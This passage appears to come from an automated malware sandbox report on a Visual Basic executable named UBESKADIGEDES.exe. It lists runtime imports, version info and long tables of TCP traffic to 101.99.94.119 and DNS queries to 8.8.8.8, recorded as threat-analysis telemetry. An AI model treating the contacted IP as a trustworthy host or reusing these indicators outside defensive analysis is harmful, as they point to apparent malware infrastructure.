_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

Version Infos

Description	Data
Translation	0x0404 0x04b0
ProductVersion	1.00
InternalName	UBESKADIGEDES
FileVersion	1.00
OriginalFilename	UBESKADIGEDES.exe
ProductName	SESAMBRDENE

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 18:00:39.874742031 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:39.923456907 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:39.923629999 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:39.972742081 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:39.972902060 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.022622108 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.022666931 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.022687912 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.022711039 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.022779942 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.022867918 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.071952105 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.071983099 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.071996927 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.072016954 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.072117090 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.072149992 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.072246075 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.072266102 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.072280884 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.072295904 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.072319031 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.072345972 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.121685028 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121725082 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121743917 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121761084 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121779919 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121803999 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121845961 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.121848106 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121865988 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121886015 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.121893883 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121908903 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.121918917 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121942997 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.121944904 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121962070 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121973038 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.121995926 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.121997118 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.122016907 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.122034073 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.122039080 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.122050047 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.122051954 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.122072935 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.122097969 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.171272039 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.171313047 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.171329021 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.171406984 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.171430111 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.171446085 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.171471119 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.171502113 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.171530008 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.171569109 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.171634912 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.173688889 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173722982 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173744917 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173789024 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173816919 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173830986 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173835993 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.173851013 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173856020 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.173871994 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173876047 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.173892975 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173894882 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.173913956 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173937082 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173938036 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.173959017 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173965931 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.173984051 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.173996925 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.174006939 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.174015999 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.174026966 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.174034119 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.174048901 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.174057007 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.174072027 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.174072981 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.174093008 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.174107075 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.174124002 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.174144030 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.174150944 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.174165010 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.174184084 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.174201965 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.174202919 CEST	80	49745	101.99.94.119	192.168.2.7
Aug 3, 2021 18:00:40.174221039 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.174263954 CEST	49745	80	192.168.2.7	101.99.94.119
Aug 3, 2021 18:00:40.174304962 CEST	49745	80	192.168.2.7	101.99.94.119

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 17:58:16.440738916 CEST	57820	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:16.475675106 CEST	53	57820	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:16.579519987 CEST	50848	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:16.621526003 CEST	53	50848	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:17.839984894 CEST	61242	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:17.872473955 CEST	53	61242	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:17.962902069 CEST	58562	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:17.987981081 CEST	56590	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:17.998259068 CEST	53	58562	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:18.015752077 CEST	53	56590	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:18.606568098 CEST	60501	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:18.643760920 CEST	53	60501	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:18.908401966 CEST	53775	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:18.934632063 CEST	53	53775	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:19.739556074 CEST	51837	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:19.769608974 CEST	53	51837	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:20.911313057 CEST	55411	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:20.938981056 CEST	53	55411	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:23.258510113 CEST	63668	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:23.291285992 CEST	53	63668	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:25.412982941 CEST	54640	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:25.447674036 CEST	53	54640	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:28.105573893 CEST	58739	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:28.133821011 CEST	53	58739	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:29.263022900 CEST	60338	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:29.292732000 CEST	53	60338	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:30.125112057 CEST	58717	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:30.150329113 CEST	53	58717	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:30.946235895 CEST	59762	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:30.970901966 CEST	53	59762	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:32.005506992 CEST	54329	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:32.033938885 CEST	53	54329	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:32.833307028 CEST	58052	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:32.865818977 CEST	53	58052	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:33.629323006 CEST	54008	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:33.655311108 CEST	53	54008	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:37.728688002 CEST	59451	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:37.763128996 CEST	53	59451	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:37.822899103 CEST	52914	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:37.847511053 CEST	53	52914	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:38.796367884 CEST	64569	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:38.824577093 CEST	53	64569	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:39.631208897 CEST	52816	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:39.658957958 CEST	53	52816	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:48.997100115 CEST	50781	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:49.023657084 CEST	53	50781	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:50.127543926 CEST	54230	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:50.161746025 CEST	53	54230	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:51.156281948 CEST	54911	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:51.181307077 CEST	53	54911	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:58.478358030 CEST	49958	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:58.520407915 CEST	53	49958	8.8.8.8	192.168.2.7
Aug 3, 2021 17:58:59.466578960 CEST	50860	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:58:59.496021986 CEST	53	50860	8.8.8.8	192.168.2.7
Aug 3, 2021 17:59:00.389763117 CEST	50452	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:59:00.421463013 CEST	53	50452	8.8.8.8	192.168.2.7
Aug 3, 2021 17:59:03.105281115 CEST	59730	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:59:03.153166056 CEST	53	59730	8.8.8.8	192.168.2.7
Aug 3, 2021 17:59:06.926120996 CEST	59310	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:59:06.966038942 CEST	53	59310	8.8.8.8	192.168.2.7
Aug 3, 2021 17:59:07.781122923 CEST	51919	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:59:07.815223932 CEST	53	51919	8.8.8.8	192.168.2.7
Aug 3, 2021 17:59:08.752654076 CEST	64296	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:59:08.788343906 CEST	53	64296	8.8.8.8	192.168.2.7
Aug 3, 2021 17:59:30.853703976 CEST	56680	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:59:30.888529062 CEST	53	56680	8.8.8.8	192.168.2.7
Aug 3, 2021 17:59:56.405462980 CEST	58820	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:59:56.441220045 CEST	53	58820	8.8.8.8	192.168.2.7
Aug 3, 2021 17:59:58.568928003 CEST	60983	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:59:58.601603031 CEST	53	60983	8.8.8.8	192.168.2.7
Aug 3, 2021 17:59:59.414450884 CEST	49247	53	192.168.2.7	8.8.8.8
Aug 3, 2021 17:59:59.461498022 CEST	53	49247	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:00.275978088 CEST	52286	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:00.308758974 CEST	53	52286	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:00.934351921 CEST	56064	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:00.970048904 CEST	53	56064	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:01.636117935 CEST	63744	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:01.672331095 CEST	53	63744	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:02.267333031 CEST	61457	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:02.295129061 CEST	53	61457	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:03.171636105 CEST	58367	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:03.207226992 CEST	53	58367	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:03.965982914 CEST	60599	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:03.998769999 CEST	53	60599	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:05.048789978 CEST	59571	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:05.084439039 CEST	53	59571	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:07.888953924 CEST	52689	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:07.922182083 CEST	53	52689	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:36.499108076 CEST	50290	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:36.548563004 CEST	53	50290	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:40.725461960 CEST	60427	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:40.761003017 CEST	53	60427	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:42.953814983 CEST	56209	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:42.986603022 CEST	53	56209	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:45.163568974 CEST	59582	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:45.200649023 CEST	53	59582	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:47.377684116 CEST	60949	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:47.415944099 CEST	53	60949	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:49.570652962 CEST	58542	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:49.603174925 CEST	53	58542	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:51.785244942 CEST	59179	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:51.812900066 CEST	53	59179	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:53.982469082 CEST	60927	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:54.018591881 CEST	53	60927	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:56.242800951 CEST	57854	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:56.278626919 CEST	53	57854	8.8.8.8	192.168.2.7
Aug 3, 2021 18:00:58.458664894 CEST	62026	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:00:58.484508038 CEST	53	62026	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:00.649725914 CEST	59453	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:00.686336040 CEST	53	59453	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:02.853516102 CEST	62468	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:02.893786907 CEST	53	62468	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:05.072191954 CEST	52563	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:05.097134113 CEST	53	52563	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:07.272125006 CEST	54721	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:07.305535078 CEST	53	54721	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:09.504134893 CEST	62826	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:09.539190054 CEST	53	62826	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:11.823220015 CEST	62046	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:11.859661102 CEST	53	62046	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:15.024833918 CEST	51223	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:15.058917046 CEST	53	51223	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:17.233573914 CEST	63908	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:17.270273924 CEST	53	63908	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:19.463181973 CEST	49226	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:19.490765095 CEST	53	49226	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:21.663360119 CEST	60212	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:21.704298019 CEST	53	60212	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:23.853765965 CEST	58867	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:23.886974096 CEST	53	58867	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:26.038454056 CEST	50864	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:26.071243048 CEST	53	50864	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:28.311839104 CEST	61504	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:28.346940041 CEST	53	61504	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:30.514034033 CEST	60231	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:30.546425104 CEST	53	60231	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:32.702085018 CEST	50095	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:32.729451895 CEST	53	50095	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:34.914820910 CEST	59654	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:34.942574024 CEST	53	59654	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:37.102677107 CEST	58233	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:37.136523008 CEST	53	58233	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:39.300961018 CEST	56822	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:39.335952044 CEST	53	56822	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:41.516207933 CEST	62572	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:41.540939093 CEST	53	62572	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:43.755731106 CEST	57179	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:43.783260107 CEST	53	57179	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:45.963052034 CEST	56124	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:45.997164011 CEST	53	56124	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:48.162206888 CEST	62287	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:48.197298050 CEST	53	62287	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:50.369716883 CEST	54644	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:50.403202057 CEST	53	54644	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:52.571094990 CEST	59159	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:52.601558924 CEST	53	59159	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:54.775854111 CEST	57924	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:54.808830976 CEST	53	57924	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:56.963598967 CEST	51712	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:56.996222019 CEST	53	51712	8.8.8.8	192.168.2.7
Aug 3, 2021 18:01:59.232003927 CEST	58865	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:01:59.268136978 CEST	53	58865	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:01.442179918 CEST	64337	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:01.475634098 CEST	53	64337	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:03.636559010 CEST	50407	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:03.671786070 CEST	53	50407	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:06.978085995 CEST	61075	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:07.007635117 CEST	53	61075	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:09.167769909 CEST	54952	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:09.203102112 CEST	53	54952	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:11.370918036 CEST	59186	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:11.403228998 CEST	53	59186	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:13.576644897 CEST	52280	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:13.610809088 CEST	53	52280	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:15.953099012 CEST	51794	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:15.977773905 CEST	53	51794	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:18.953138113 CEST	50815	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:18.978045940 CEST	53	50815	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:21.142889023 CEST	58498	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:21.190454006 CEST	53	58498	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:23.342089891 CEST	56862	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:23.369951963 CEST	53	56862	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:25.529216051 CEST	61807	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:25.565526962 CEST	53	61807	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:27.731426954 CEST	52009	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:27.766803026 CEST	53	52009	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:29.919620037 CEST	58648	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:29.953804970 CEST	53	58648	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:32.171211004 CEST	59337	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:32.196198940 CEST	53	59337	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:34.362713099 CEST	59269	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:34.395683050 CEST	53	59269	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:36.564641953 CEST	49802	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:36.598649979 CEST	53	49802	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:38.778537035 CEST	50706	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:38.814450979 CEST	53	50706	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:40.987184048 CEST	55153	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:41.020540953 CEST	53	55153	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:43.195158958 CEST	59744	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:43.230957031 CEST	53	59744	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:45.389694929 CEST	59987	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:45.415544033 CEST	53	59987	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:47.632599115 CEST	61272	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:47.665286064 CEST	53	61272	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:49.815867901 CEST	54352	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:49.849251986 CEST	53	54352	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:52.019388914 CEST	60696	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:52.054344893 CEST	53	60696	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:54.202487946 CEST	59139	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:54.227219105 CEST	53	59139	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:56.397581100 CEST	59565	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:56.434458971 CEST	53	59565	8.8.8.8	192.168.2.7
Aug 3, 2021 18:02:58.597013950 CEST	56397	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:02:58.624461889 CEST	53	56397	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:00.781600952 CEST	52818	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:00.814369917 CEST	53	52818	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:03.056288958 CEST	54236	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:03.089088917 CEST	53	54236	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:04.662933111 CEST	54698	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:04.696907997 CEST	53	54698	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:05.201159954 CEST	58468	53	192.168.2.7	8.8.8.8
